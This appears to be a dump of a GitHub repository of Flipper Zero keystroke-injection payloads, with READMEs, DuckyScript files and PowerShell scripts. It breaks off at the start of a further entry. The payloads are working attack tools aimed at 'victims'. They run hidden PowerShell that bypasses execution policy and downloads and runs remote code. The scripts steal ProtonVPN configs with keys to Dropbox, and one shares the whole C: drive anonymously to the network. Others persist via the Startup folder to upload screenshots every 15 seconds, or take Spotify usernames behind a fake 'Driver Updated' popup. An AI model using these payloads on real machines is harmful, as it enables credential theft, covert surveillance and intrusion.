10,11\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "FlipperZero/payloads/Proton-Hog/payload.txt",
    "content": "REM     Title: Proton-Hog\r\nREM     Author: atomiczsec\r\nREM     Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.\r\nREM     Target: Windows 10\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "FlipperZero/payloads/Proton-Hog/s.ps1",
    "content": "function DropBox-Upload {\r\n\r\n    [CmdletBinding()]\r\n    param (\r\n        \r\n    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n    [Alias(\"f\")]\r\n    [string]$SourceFilePath\r\n    ) \r\n    $DropBoxAccessToken = \"YOUR-DROPBOX-TOKEN\"   # Replace with your DropBox Access Token\r\n    $outputFile = Split-Path $SourceFilePath -leaf\r\n    $TargetFilePath=\"/$outputFile\"\r\n    $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n    $authorization = \"Bearer \" + $DropBoxAccessToken\r\n    $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n    $headers.Add(\"Authorization\", $authorization)\r\n    $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n    $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n    }\r\n\r\n# Test the path to the ProtonVPN directory and if it is availible, change directory to where the user.config is stored\r\n\r\nif (-not(Test-Path \"$env:USERPROFILE\\AppData\\Local\\ProtonVPN\")) {\r\n     try {\r\n         Write-Host \"The VPN folder has not been found. \"\r\n     }\r\n     catch {\r\n         throw $_.Exception.Message\r\n     }\r\n }\r\n\r\n  else {\r\n$protonVpnPath = \"$env:USERPROFILE\\AppData\\Local\\ProtonVPN\"\r\ncd $protonVpnPath\r\nGet-ChildItem | Where-Object {$_.name -Match \"ProtonVPN.exe\"} | cd\r\nGet-ChildItem | cd\r\n\r\n# Upload user.config to dropbox\r\nDropBox-Upload -f \"user.config\"\r\n} "
  },
  {
    "path": "FlipperZero/payloads/Pwn-Drive/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/lock.png\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Pwn+Drive!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Pwn-Drive\n\nA payload to share the victims \"C:\" drive to the network.\n\n## Description\n\nThis payload will share the entire victims \"C:\" drive to the entire network for further exploitation.\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "FlipperZero/payloads/Pwn-Drive/c.ps1",
    "content": "#Pwn-Drive\r\n\r\n#Enable Network Discovery\r\nnetsh advfirewall firewall set rule group=”network discovery” new enable=yes\r\n\r\n#Enable File and Print\r\nnetsh firewall set service type=fileandprint mode=enable profile=all\r\n\r\n#Setting Registry Values for allowing access to drive without credentials\r\nSet-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" -Name everyoneincludesanonymous -Value 1 -Force\r\nSet-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanManServer\\Parameters\\\" -Name restrictnullsessacces -Value 0 -Force\r\n\r\n#Sharing the Drive\r\nNew-SmbShare -Name \"Windows Update\" -Path \"C:\\\""
  },
  {
    "path": "FlipperZero/payloads/Pwn-Drive/payload.txt",
    "content": "REM     Title: Pwn-Drive\r\nREM     Author: atomiczsec\r\nREM     Description: This payload will share the entire victims \"C:\" drive to the entire network for further exploitation.\r\nREM     Target: Windows 10\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "FlipperZero/payloads/RanFunWare/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/WannaCry.png\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=RanFunWare!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# RanFunWare\n\nA payload to prank your friends into thinking their computer got hit with ransomware.\n\n## Description\n\nThis payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable)\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "FlipperZero/payloads/RanFunWare/payload.txt",
    "content": "REM     Title: RanFunWare\r\nREM     Author: atomiczsec\r\nREM     Description: This payload will prank your target into thinking their machine got hit with ransomware.\r\nREM     Target: Windows 10\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "FlipperZero/payloads/RanFunWare/r.ps1",
    "content": "#Hides Desktop Icons\r\n$Path=\"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\"\r\nSet-ItemProperty -Path $Path -Name \"HideIcons\" -Value 1\r\nGet-Process \"explorer\"| Stop-Process\r\n\r\n#Changes Background  \r\n#URL For the Image of your choice (Wanna Cry Ransomware Background)\r\n$url = \"https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg\"\r\n\r\n\r\nInvoke-WebRequest $url -OutFile C:\\temp\\test.jpg\r\n\r\n\r\n$setwallpapersrc = @\"\r\nusing System.Runtime.InteropServices;\r\n\r\npublic class Wallpaper\r\n{\r\n  public const int SetDesktopWallpaper = 20;\r\n  public const int UpdateIniFile = 0x01;\r\n  public const int SendWinIniChange = 0x02;\r\n  [DllImport(\"user32.dll\", SetLastError = true, CharSet = CharSet.Auto)]\r\n  private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);\r\n  public static void SetWallpaper(string path)\r\n  {\r\n    SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange);\r\n  }\r\n}\r\n\"@\r\nAdd-Type -TypeDefinition $setwallpapersrc\r\n\r\n[Wallpaper]::SetWallpaper(\"C:\\temp\\test.jpg\")\r\n\r\n\r\n#Pop Up Message\r\n\r\nfunction MsgBox {\r\n\r\n[CmdletBinding()]\r\nparam (\t\r\n[Parameter (Mandatory = $True)]\r\n[Alias(\"m\")]\r\n[string]$message,\r\n\r\n[Parameter (Mandatory = $False)]\r\n[Alias(\"t\")]\r\n[string]$title,\r\n\r\n[Parameter (Mandatory = $False)]\r\n[Alias(\"b\")]\r\n[ValidateSet('OK','OKCancel','YesNoCancel','YesNo')]\r\n[string]$button,\r\n\r\n[Parameter (Mandatory = $False)]\r\n[Alias(\"i\")]\r\n[ValidateSet('None','Hand','Question','Warning','Asterisk')]\r\n[string]$image\r\n)\r\n\r\nAdd-Type -AssemblyName PresentationCore,PresentationFramework\r\n\r\nif (!$title) {$title = \" \"}\r\nif (!$button) {$button = \"OK\"}\r\nif (!$image) {$image = \"None\"}\r\n\r\n[System.Windows.MessageBox]::Show($message,$title,$button,$image)\r\n\r\n}\r\n\r\nMsgBox -m 'Your Computer Has Been Infected' -t \"Warning\" -b OKCancel -i Warning\r\n"
  },
  {
    "path": "FlipperZero/payloads/Screen-Shock/I.bat",
    "content": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c.ps1\"}\"\r\npause\r\n"
  },
  {
    "path": "FlipperZero/payloads/Screen-Shock/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/screen.png\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Screen+Shock!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Screen-Shock\n\nThis payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)\n\n## Description\n\nThis payload uses iwr to download 2 files\n* I.bat\n* c.ps1\n\n**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup\n\n**c.ps1** will sit in AppData\\Roaming folder, taking a screenshot of all monitors every 15 seconds\n\nThen the contents will then be sent to the DropBox for viewing pleasure\n\n\n\n## Getting Started\n\n### Dependencies\n\n* Pastebin or other file sharing service, Dropbox\n* Windows 10\n* [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Device will download both files and place them in proper directories to then run the script\n```\npowershell -w h -NoP -NonI -Ep Bypass \"echo (iwr PASTEBIN LINK FOR BAT).content > \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\l.bat\";echo (iwr PASTEBIN LINK FOR PS1).content > \"$env:APPDATA\\c.ps1\";powershell \"$env:APPDATA\\c.ps1\"\"\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "FlipperZero/payloads/Screen-Shock/c.ps1",
    "content": "function DropBox-Upload {\r\n\r\n[CmdletBinding()]\r\nparam (\r\n    \r\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n[Alias(\"f\")]\r\n[string]$SourceFilePath\r\n) \r\n$DropBoxAccessToken = \"YOUR-DROPBOX-TOKEN\"   # Replace with your DropBox Access Token\r\n$outputFile = Split-Path $SourceFilePath -leaf\r\n$TargetFilePath=\"/$outputFile\"\r\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n$authorization = \"Bearer \" + $DropBoxAccessToken\r\n$headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n$headers.Add(\"Authorization\", $authorization)\r\n$headers.Add(\"Dropbox-API-Arg\", $arg)\r\n$headers.Add(\"Content-Type\", 'application/octet-stream')\r\nInvoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n}\r\n\r\nwhile(1){\r\n\r\n  Add-Type -AssemblyName System.Windows.Forms,System.Drawing\r\n\r\n  $screens = [Windows.Forms.Screen]::AllScreens\r\n\r\n  $top    = ($screens.Bounds.Top    | Measure-Object -Minimum).Minimum\r\n  $left   = ($screens.Bounds.Left   | Measure-Object -Minimum).Minimum\r\n  $width  = ($screens.Bounds.Right  | Measure-Object -Maximum).Maximum\r\n  $height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum\r\n\r\n  $bounds   = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height)\r\n  $bmp      = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height)\r\n  $graphics = [Drawing.Graphics]::FromImage($bmp)\r\n\r\n  $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)\r\n\r\n  $bmp.Save(\"$env:USERPROFILE\\AppData\\Local\\Temp\\$env:computername-Capture.png\")\r\n  $graphics.Dispose()\r\n  $bmp.Dispose()\r\n  \r\n  start-sleep -Seconds 15\r\n \"$env:USERPROFILE\\AppData\\Local\\Temp\\$env:computername-Capture.png\" | DropBox-Upload\r\n}"
  },
  {
    "path": "FlipperZero/payloads/Screen-Shock/payload.txt",
    "content": "REM     Title: Screen-Shock\r\nREM     Author: atomiczsec\r\nREM     Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)\r\nREM     Target: Windows 10\r\nDELAY 2000\r\nGUI\r\nDELAY\r\nSTRING powershell -w h -NoP -NonI -Ep Bypass \"echo (iwr PASTEBIN LINK FOR BAT).content > \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\l.bat\";echo (iwr PASTEBIN LINK FOR PS1).content > \"$env:APPDATA\\c.ps1\";powershell \"$env:APPDATA\\c.ps1\"\" \r\nENTER\r\nREM     Remember to replace the link with your pastebin shared link for the intended files to download\r\nREM     Also remember to put in your discord webhook in c.ps1\r\nREM     For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH"
  },
  {
    "path": "FlipperZero/payloads/Screen-Shock/placeholder",
    "content": "\n"
  },
  {
    "path": "FlipperZero/payloads/Spotify-Spy/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Spotify+Spy!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Spotify-Spy\n\nThis payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.\n\n\n## Description\n\nHave you ever been too afraid to ask your co-worker for what song that was or what playlist this is? Fear no more!! Spotify-Spy will grab their spotify username for you so you dont have to socially interact with anyone!\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "FlipperZero/payloads/Spotify-Spy/SS.ps1",
    "content": "#Spotify-Spy\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Spotify\\Users\"\r\n\r\n#Create varible for file name\r\n$F1 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_spotify_users.txt\"\r\n\r\n# Gets the name of the spotify user\r\ncd \"$env:APPDATA\\Spotify\\Users\" \r\nGet-ChildItem > $F1\r\n\r\n# Copy Spotify User to Temp Directory to get sent to Dropbox\r\n\r\nCopy-Item \"$F1\" -Destination \"$env:tmp/$F1\" \r\n\r\n\r\nfunction DropBox-Upload {\r\n\r\n    [CmdletBinding()]\r\n    param (\r\n        \r\n    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n    [Alias(\"f\")]\r\n    [string]$SourceFilePath\r\n    ) \r\n    $DropBoxAccessToken = \"YOUR-DROPBOX-ACCESS-TOKEN\"   # Replace with your DropBox Access Token\r\n    $outputFile = Split-Path $SourceFilePath -leaf\r\n    $TargetFilePath=\"/$outputFile\"\r\n    $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n    $authorization = \"Bearer \" + $DropBoxAccessToken\r\n    $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n    $headers.Add(\"Authorization\", $authorization)\r\n    $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n    $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n    }\r\n\r\nDropBox-Upload -f \"$env:tmp/$F1\"\r\nrm $F1\r\n\r\n$done = New-Object -ComObject Wscript.Shell;$done.Popup(\"Driver Updated\",1)\r\n"
  },
  {
    "path": "FlipperZero/payloads/Spotify-Spy/payload.txt",
    "content": "REM     Title: Spotify-Spy\r\nREM     Author: atomiczsec\r\nREM     Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.\r\nREM     Target: Windows 10\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "FlipperZero/payloads/Water-UnMark/README.md",
